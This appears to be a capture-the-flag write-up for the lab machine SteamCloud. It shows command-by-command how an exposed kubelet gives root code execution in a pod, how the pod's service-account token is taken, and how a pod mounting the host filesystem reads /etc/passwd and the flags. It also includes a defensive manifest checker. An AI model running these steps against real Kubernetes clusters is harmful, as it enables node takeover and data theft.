### Enumeration

Starting off with an nmap scan:

```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 17:55 EAT
Stats: 0:03:19 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 17:58 (0:00:00 remaining)
Nmap scan report for 10.10.11.133
Host is up (0.23s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT     STATE    SERVICE          VERSION
21/tcp   filtered ftp
22/tcp   open     ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
|   256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
|_  256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
25/tcp   filtered smtp
110/tcp  filtered pop3
113/tcp  filtered ident
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
256/tcp  filtered fw1-secureremote
443/tcp  filtered https
445/tcp  filtered microsoft-ds
554/tcp  filtered rtsp
587/tcp  filtered submission
995/tcp  filtered pop3s
1025/tcp filtered NFS-or-IIS
1720/tcp filtered h323q931
1723/tcp filtered pptp
2042/tcp filtered isis
2869/tcp filtered icslap
3001/tcp filtered nessus
3306/tcp filtered mysql
3389/tcp filtered ms-wbt-server
8443/tcp open     ssl/https-alt
| tls-alpn: 
|   h2
|_  http/1.1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 5d6eacd0-54ad-4080-8f1f-395d6aef4b44
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8
|     X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec
|     Date: Wed, 16 Feb 2022 15:00:41 GMT
|     Content-Length: 212
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot get path \"/nice ports,/Trinity.txt.bak\"","reason":"Forbidden","details":{},"code":403}
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 3bb3108d-9c18-4648-b946-d2b9627e7d7f
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8
|     X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec
|     Date: Wed, 16 Feb 2022 15:00:39 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot get path \"/\"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 95c89c5c-b2ef-4197-8741-5d5eab22fb65
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8
|     X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec
|     Date: Wed, 16 Feb 2022 15:00:40 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot options path \"/\"","reason":"Forbidden","details":{},"code":403}
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2022-02-15T14:59:41
|_Not valid after:  2025-02-15T14:59:41
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.92%T=SSL%I=7%D=2/16%Time=620D10AB%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,22F,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x203bb31
SF:08d-9c18-4648-b946-d2b9627e7d7f\r\nCache-Control:\x20no-cache,\x20priva
SF:te\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20n
SF:osniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2042e4e9fa-d40b-4903-a4d2-e1
SF:bb7a5d53b8\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20990c5c05-a579-40b2-
SF:b471-4057191fafec\r\nDate:\x20Wed,\x2016\x20Feb\x202022\x2015:00:39\x20
SF:GMT\r\nContent-Length:\x20185\r\n\r\n{\"kind\":\"Status\",\"apiVersion\
SF:":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden
SF::\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/
SF:\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(HTTP
SF:Options,233,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x2095c89c5c-b2e
SF:f-4197-8741-5d5eab22fb65\r\nCache-Control:\x20no-cache,\x20private\r\nC
SF:ontent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosniff\
SF:r\nX-Kubernetes-Pf-Flowschema-Uid:\x2042e4e9fa-d40b-4903-a4d2-e1bb7a5d5
SF:3b8\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20990c5c05-a579-40b2-b471-40
SF:57191fafec\r\nDate:\x20Wed,\x2016\x20Feb\x202022\x2015:00:40\x20GMT\r\n
SF:Content-Length:\x20189\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1\
SF:",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x20Us
SF:er\x20\\\"system:anonymous\\\"\x20cannot\x20options\x20path\x20\\\"/\\\
SF:"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(FourOhF
SF:ourRequest,24A,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x205d6eacd0-
SF:54ad-4080-8f1f-395d6aef4b44\r\nCache-Control:\x20no-cache,\x20private\r
SF:\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosni
SF:ff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2042e4e9fa-d40b-4903-a4d2-e1bb7a
SF:5d53b8\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20990c5c05-a579-40b2-b471
SF:-4057191fafec\r\nDate:\x20Wed,\x2016\x20Feb\x202022\x2015:00:41\x20GMT\
SF:r\nContent-Length:\x20212\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"
SF:v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x2
SF:0User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/nice
SF:\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\",\"details\"
SF::{},\"code\":403}\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.14 seconds
```

We have two open ports, 22 and 8443, and the nmap report also gives us some very interesting information in the TLS certificate:

```
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
```

Opening port 8443 in the browser gave me this response:

![](https://i.imgur.com/ZJXiKCj.png)

Changing `http://ip:8443/` to `https://ip:8443/` gave a different response:

![](https://i.imgur.com/cnM6jeB.png)

I decided to go on with Python, though curl would do just as well. `req.py`:

```python
#!/usr/bin/python3
# author : @tahaafarooq#9056
import requests

# The API server on 8443 presents minikube's self-signed certificate,
# so certificate verification is turned off for this probe.
host = "https://10.10.11.133:8443/"
headers = {'Content-Type': 'application/json'}

req = requests.get(host, headers=headers, verify=False)
res = req.text
print(res)
```

`response`:

```
[tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'.
Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot get path \"/\"","reason":"Forbidden","details":{},"code":403}
```

To get cleaner JSON output, I piped it through `jq`:

```
[tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py | jq
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {},
  "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
  "reason": "Forbidden",
  "details": {},
  "code": 403
}
```

The error message says that the user `system:anonymous` is forbidden from accessing the path `/`, which means we first have to authenticate.

The initial scan only covered the default ports; a scan of all ports with the `-p-` flag showed several more:

```
PORT      STATE SERVICE
22/tcp    open  ssh
2379/tcp  open  etcd-client
2380/tcp  open  etcd-server
8443/tcp  open  https-alt
10250/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds
```

We have etcd, a Kubernetes component, listening on port 2379 as client and on port 2380 as server; port 10250 is the kubelet, a Kubernetes node agent, which I found out by searching for the port on Google; and port 8443 is the Kubernetes API. Now this makes clear sense!
Opening port 10250 with my simple script (now changed to prompt for the host URL) gave me `404 page not found`:

```
[tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py
Enter host url (https://) : https://10.10.11.133:10250/
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
404 page not found
```

I proceeded with directory busting:

```
[tahaafarooq@urchinsec-lab steamcloud]$ sudo dirsearch -u https://10.10.11.133:10250/ -e*
[sudo] password for tahaafarooq:

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: GET | Threads: 30 | Wordlist size: 9073

Output File: /usr/lib/python3.10/site-packages/dirsearch-0.4.2-py3.10.egg/dirsearch/reports/10.10.11.133-10250/-_22-02-16_18-24-31.txt

Log File: /usr/lib/python3.10/site-packages/dirsearch-0.4.2-py3.10.egg/dirsearch/logs/22-02-16_18-24-31.log

Target: https://10.10.11.133:10250/

[18:24:32] Starting:
[18:24:34] 301 -   46B  - /%2e%2e//google.com  ->  /google.com
[18:24:34] 301 -   46B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[18:25:29] 301 -   46B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[18:25:30] 301 -   87B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[18:25:39] 301 -   48B  - /debug/pprof  ->  /debug/pprof/
[18:25:39] 200 -   69KB - /debug/pprof/goroutine?debug=1
[18:25:43] 301 -   74B  - /engine/classes/swfupload//swfupload.swf  ->  /engine/classes/swfupload/swfupload.swf
[18:25:44] 301 -   77B  - /engine/classes/swfupload//swfupload_f9.swf  ->  /engine/classes/swfupload/swfupload_f9.swf
[18:25:45] 301 -   62B  - /extjs/resources//charts.swf  ->  /extjs/resources/charts.swf
[18:25:52] 301 -   72B  - /html/js/misc/swfupload//swfupload.swf  ->  /html/js/misc/swfupload/swfupload.swf
[18:26:02] 301 -   41B  - /logs  ->  /logs/
[18:26:03] 200 -    2KB - /logs/
[18:26:11] 200 -  179KB - /metrics
```

The `logs` folder looked interesting, so I opened it in the browser: it contains a lot of folders and log files worth a look.

![](https://i.imgur.com/oAtkeph.png)

Among them is `/logs/pods/`, which means I can enumerate all the pods.

![](https://i.imgur.com/PpiFXgz.png)

And there we have it: all the pods in the Kubernetes cluster.

### Initial Access & Foothold

The API running on port 8443 is undocumented, meaning we don't know which requests to send, how the data is arranged, or which parameters take which values. Fortunately we can still use `kubectl` to interface with it and get inside the pod.

![](https://i.imgur.com/NX0j9Tr.png)

With `kubeletctl --server ip pods` we can list the available pods. For the foothold, I scan for RCE with `kubeletctl --server ip scan rce`, which tells me whether I can run commands on the available pods.

![](https://i.imgur.com/vROz2Cv.png)

We can run commands on the `nginx` pod and the `kube-proxy-j487c` pod:

```
[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root)
```

### Privilege Escalation

Now that we have RCE, though only inside a pod, my next step is to get the token needed for authentication and the certificates, which should allow me to create a service account with higher privileges.
![](https://i.imgur.com/qnyXvIP.png)

Alright, we have the certificate and the token, so we can use them with `kubectl`:

```
[tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          68m
```

I now list the privileges I have on the default service account:

![](https://i.imgur.com/0zcmhmB.png)

Okay, it seems I can create pods in the default namespace, as well as get and list them as before. My approach now is to create a pod using the nginx image that mounts the host's root filesystem. I wrote this basic configuration file:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: sample
  namespace: default
spec:
  containers:
  - name: sample
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /root
      name: rooty
  volumes:
  - name: rooty
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
```

which I use to create the pod:

```
[tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f sus.yaml
pod/sample created
```

```
[tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME     READY   STATUS    RESTARTS   AGE
nginx    1/1     Running   0          81m
sample   1/1     Running   0          18s
```

And we can see that it's already up and running!
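As an added example (not part of the original writeup), here is the kind of manifest check an admission controller or CI pipeline would run to reject the pod above before it is scheduled: it flags the `hostPath` mount of `/`, `hostNetwork`, and the auto-mounted service account token. The manifest is the page's `sus.yaml` written out as a Python dict so the script runs offline; `audit_pod`, `SENSITIVE_HOST_PATHS` and `HARDENED_POD` are my own names.

```python
# Added example, not from the original writeup: audit a Pod manifest for the
# settings that turn it into a node takeover. SUS_POD is the page's sus.yaml
# as a dict (constructed here so no YAML parser is needed).

SUS_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "sample", "namespace": "default"},
    "spec": {
        "containers": [{"name": "sample", "image": "nginx:1.14.2",
                        "volumeMounts": [{"mountPath": "/root", "name": "rooty"}]}],
        "volumes": [{"name": "rooty", "hostPath": {"path": "/"}}],
        "automountServiceAccountToken": True,
        "hostNetwork": True,
    },
}

# Same image with no host access: what a pod that only serves nginx should look like.
HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "sample", "namespace": "default"},
    "spec": {"containers": [{"name": "sample", "image": "nginx:1.14.2"}],
             "automountServiceAccountToken": False},
}

# Host directories whose exposure hands over the node or its kubelet credentials.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/home", "/var/lib/kubelet", "/var/run/docker.sock")

def _is_sensitive(path):
    norm = "/" + path.strip("/")          # "/" -> "/", "/etc/" -> "/etc"
    return norm == "/" or any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)

def audit_pod(pod):
    """Return a list of findings (strings) for a Pod manifest; empty means clean."""
    spec = pod.get("spec", {})
    findings = []
    if spec.get("hostNetwork"):
        findings.append("hostNetwork: pod shares the node's network namespace")
    # The field defaults to true when omitted, so an absent key is still a finding.
    if spec.get("automountServiceAccountToken", True):
        findings.append("automountServiceAccountToken: service account token mounted in pod")
    mounts = {m["name"]: m["mountPath"] for c in spec.get("containers", [])
              for m in c.get("volumeMounts", [])}
    for vol in spec.get("volumes", []):
        path = vol.get("hostPath", {}).get("path", "")
        if path and _is_sensitive(path):
            findings.append(f"hostPath {path!r} mounted at {mounts.get(vol['name'], '?')}: "
                            "node filesystem exposed")
    for c in spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"container {c['name']!r}: privileged")
    return findings
```

Running `audit_pod(SUS_POD)` returns three findings, while `audit_pod(HARDENED_POD)` returns none; an admission webhook built on the same logic would have rejected `sus.yaml` even though the service account was allowed to create pods.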
```
[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "id" -p sample -c sample
uid=0(root) gid=0(root) groups=0(root)
```

I try to get the root flag:

```
[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/root.txt" -p sample -c sample
cat: /root/root.txt: No such file or directory
command terminated with exit code 1
```

So I take a look at `/etc/passwd`:

```
[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /etc/passwd" -p sample -c sample
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
nginx:x:101:101:nginx user,,,:/nonexistent:/bin/false
```

This is the container's `/etc/passwd`, and it shows no user with a `/home/` directory. Since the host's filesystem is mounted at `/root` in the pod, both the user's and root's home directories should be under `/root/`.

**USER FLAG**

```
[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/home/user/user.txt" -p sample -c sample
c65246eb8f02a2366f02877d567c1265
```

**ROOT FLAG**

```
[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/root/root.txt" -p sample -c sample
3370f968dc760bd1ca95dd701be8b520
```

Contacts: [tahaafarooq](https://twitter.com/tahaafarooq)

---

![](https://i.imgur.com/kOD5xfq.gif)